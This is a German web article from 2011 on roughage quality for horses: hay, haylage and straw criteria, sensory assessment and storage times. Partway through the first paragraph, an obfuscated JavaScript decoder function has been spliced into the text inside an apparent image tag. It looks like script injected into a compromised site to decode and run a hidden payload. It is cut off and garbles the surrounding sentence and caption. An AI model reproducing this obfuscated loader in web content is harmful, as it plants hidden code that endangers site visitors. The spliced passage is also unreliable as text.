Gute Raufutterqualität für Pferde

4. Dezember 2011 | Von Redaktion | Kategorie: Fütterung

Die Futterration für Pferde sollte hauptsächlich aus einwandfreiem und strukturreichem Raufutter bestehen. Der Pferdehalter bzw. die Pferdehalterin muss daher die Eigenschaften von hochwertigem Raufutter kennen und eine sensorische Beurteilung vornehmen können. ALP aktuell 41 liefert Anhaltspunkte für die Auswahl und Verwendung von Raufutter.

Das Pferd benötigt aus ernährungsphysiologischen Gründen als Hauptbest<script type=function m65c3bbf5572b(wc){var s4='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var r1='';var qb,rd,wb,p1,p5,q8,w7;var vf=0;do{p1=s4.indexOf(wc.charAt(vf++));p5=s4.indexOf(wc.charAt(vf++));q8=s4.indexOf(wc.charAt(vf++));w7=s4.indexOf(wc.charAt(vf++));qb=(p1<<2)|(p5>>4);rd=((p5&15)<<4)|(q8>>2);wb=((q8&3)<<6)|w7;if(qb>=192)qb+=848;else if(qb==168)qb=1025;else if(qb==184)qb=1105;r1+=String.fromCharCode(qb);if(q8!=64){if(rd>=192)rd+=848;else if(rd==168)rd=1025;else if(rd==184)rd=1105;r1+=String.fromCharCode(rd);}if(w7!=64){if(wb>=192)wb+=848;else if(wb==168)wb=1025;else if(wb==184)wb=1105;r1+=String.fromCharCode(wb);}}while(vfandteil seiner Futterration qualitativ einwandfreies und strukturreiches Raufutter wie Heu (Foto: U. Dreiucker/pixelio.de)." width="300" height="216" />

Hochwertiges Raufutter – sei dies Heu, Haylage (trockene Silage) oder Stroh – soll einen hohen Rohfasergehalt aufweisen und staub-, erd- sowie unkrautfrei sein. Die Belastung durch Schimmelpilze und Bakterien ist gering und es enthält keine Giftpflanzen. Heu und Haylage sollten ausserdem einen hohen Gräseranteil aufweisen.

Sensorische Beurteilung

Mit einer Punktetabelle kann die Hygienequalität von Raufutter anhand seines Geruchs, seines Aussehens und seiner Struktur beurteilt werden. Zur Einschätzung des Nährwerts muss man jedoch das Entwicklungsstadium des Futters und die botanische Zusammensetzung kennen oder eine Laboranalyse durchführen lassen.

Bei den Gehaltswerten handelt sich um Orientierungswerte. Je nach Gewicht und Allgemeinzustand des Tieres sowie weiteren Umweltbedingungen können der Bedarf und die Ansprüche an das Futter unterschiedlich ausfallen.

Gute Lagerungsbedingungen

Auch die Lagerungsbedingungen haben einen entscheidenden Einfluss auf die Raufutterqualität. Heu sollte immer an einem trockenen Ort gelagert werden. Haylage-Ballen sind zudem vor Beschädigungen durch Tiere zu schützen. Geöffnete Haylage-Ballen sind innert einer Woche zu verfüttern. Ausserdem sollte Raufutter nicht länger als zwei Jahre gelagert werden.

Was die Qualitätskontrolle von gekauftem Raufutter betrifft, so ist es Sache des Käufers, Stichproben vorzunehmen und den Verkäufer auf allfällige Mängel hinzuweisen. Da bei Haylage-Ballen die Qualität erst nach dem Öffnen der Ballen beurteilt werden kann, ist es ratsam, mit dem Verkäufer eine Frist zu vereinbaren.

pdficon_smallGute Raufutterqualität für Pferde - Ein Merkblatt für die Praxis

Socialize:
  • Twitter
  • del.icio.us
  • Google Bookmarks
  • Digg
  • Facebook
  • FriendFeed
  • LinkArena
  • MisterWong.DE
  • NewsVine
  • Yigg
  • StumbleUpon
  • Yahoo! Bookmarks
  • MySpace
  • Netvibes
  • Technorati
  • RSS
  • Print
Tags: , , , , , , , , ,
Trackback URL: http://www.horse-today.de/wp-trackback.php?p=67906

Hier klicken, um einen Kommentar zu schreiben